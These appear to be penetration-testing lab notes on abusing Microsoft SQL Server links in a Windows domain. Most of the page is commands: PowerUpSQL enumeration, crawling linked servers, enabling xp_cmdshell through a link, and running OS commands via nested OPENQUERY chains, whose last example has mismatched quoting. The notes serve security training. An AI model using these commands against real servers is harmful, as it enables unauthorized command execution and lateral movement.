MSSQL Servers
General
Generally deployed in a lot of Windows domains
Good option for lateral movement as domain users can be mapped to database roles
We can use PowerUpSQL for exploitation
Exploitation
Enumeration
# Discovery (SPN Scanning)
Get-SQLInstanceDomain
# Check accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
# Gather information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Database Links
Database link allows a SQL Server to access exteranl data sources like other SQL server and OLE DB data sources
For links between SQL servers, we can exectue stored procedures
Links work across forest trusts
Using PowerUpSQL
# Look for links to remote server
Get-SQLServerLink -Instance dcorp-mssql -Verbose
# Enumerate database links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
# Execute commands
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"
Using SQL Queries
/* Enumerate database links */
select * from master..sysservers
/* Run queries on a linked database through OpenQuery() */
select * from openquery("dcorp-sql1", "select * from master..sysservers")
/* Chain queries to access nested links */
select * from openquery("dcorp-sql", 'select * from openquery("dcorp-mgmt", "select * from master..sysservers")')
/* Enable xp_cmdshell */
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "eu-sql"
/* Execute commands using nested link queries */
select * from openquery("dcorp-sql1", 'select * from openquery("dcorp-mgmt", "select * from openquery("eu-sql.eu.eurocorp.local", ""select @@version as version; exec master..xp_cmdshell "powershell whoami)"")")')
Last updated